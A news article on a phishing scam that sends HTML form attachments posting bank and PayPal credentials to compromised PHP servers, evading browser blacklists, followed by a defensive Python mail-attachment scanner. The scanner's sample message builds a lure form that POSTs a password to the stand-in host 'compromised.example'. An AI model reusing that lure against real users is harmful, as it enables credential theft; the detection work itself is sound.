A new phishing scam, designed to beat the security built into the Firefox and Chrome web browsers, is targeting bank and PayPal passwords and other consumer data. The criminals are using the passwords to loot private accounts.
As part of their security packages, these browsers receive URLs of known phishing sites and won't go to them unless users specifically permit them to. But a technique discovered by M86 Security Labs gets around this blacklist protection.
The new scam doesn't need victims to visit fake websites to fill out forms that appear legitimate and reveal passwords, account numbers, and Social Security numbers.
The spammers are instead sending the forms as HTML attachments to emails. When victims fill out the forms and click to submit them, the data is sent through the browser via a POST request to PHP web servers that have been hacked.
"While the POST request sends information to the phisher's remote web server, Google Chrome and Mozilla Firefox did not detect any malicious activity," the blog says. "Months-old phishing campaigns remain undetected so it seems this tactic is quite effective."
The browsers are unable to pick up that the activity is malicious because not many compromised PHP servers get reported, meaning that their URLs don't make the blacklists.
Most users aren't educated on security enough to distinguish the URL from the PHP submission, M86 says in the blog.
Also, as the PHP script doesn't show any HTML code to the browser, the URLs that the data is sent to are hard to verify as phishing sites, the blog suggests.
In a specific case that M86 describes, the PHP server involved had been installed on a compromised Frito-Lay Web page. After grabbing the victim's data, the PHP script redirects the browser to the legitimate company the victim thought it was dealing with.
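Because the browser blacklist never sees these forms, the check has to happen at the mail gateway. The following is an added example, not code from M86 or the original article: it scans a message's HTML attachments for forms that POST to an absolute remote URL. The function names, the sample message and the host `compromised.example` are constructed for illustration.

```python
import email
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormScanner(HTMLParser):
    """Records every <form> with its action, method and input types."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append({"action": a.get("action", "").strip(),
                               "method": a.get("method", "get").lower(), "inputs": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["inputs"].append(a.get("type", "text").lower())

def remote_post_forms(raw: bytes):
    """Return (filename, host, has_password_field) for each form in an HTML
    attachment that POSTs to an absolute http(s) URL."""
    hits = []
    for part in email.message_from_bytes(raw, policy=policy.default).walk():
        name = (part.get_filename() or "").lower()
        is_html = part.get_content_type() == "text/html" and part.is_attachment()
        if part.is_multipart() or not (is_html or name.endswith((".htm", ".html"))):
            continue
        body = part.get_payload(decode=True) or b""
        scanner = FormScanner()
        scanner.feed(body.decode(part.get_content_charset() or "utf-8", "replace"))
        for form in scanner.forms:
            url = urlparse(form["action"])
            if form["method"] == "post" and url.scheme in ("http", "https") and url.hostname:
                hits.append((name, url.hostname, "password" in form["inputs"]))
    return hits

def sample_message() -> bytes:
    """Constructed sample: one lure attachment, one harmless HTML attachment."""
    msg = EmailMessage()
    msg["Subject"] = "Account verification"
    msg.set_content("Please complete the attached form.")
    msg.add_attachment('<form method="POST" action="http://compromised.example/x/save.php">'
                       '<input name="user"><input type="password" name="pw"></form>',
                       subtype="html", filename="Verify.html")
    msg.add_attachment("<p>Newsletter</p><form action='search'><input name=q></form>",
                       subtype="html", filename="news.html")
    return msg.as_bytes()
```

A hit is a reason to quarantine or strip the attachment; the host it reports is the one to check for compromise and report to the blacklist operators.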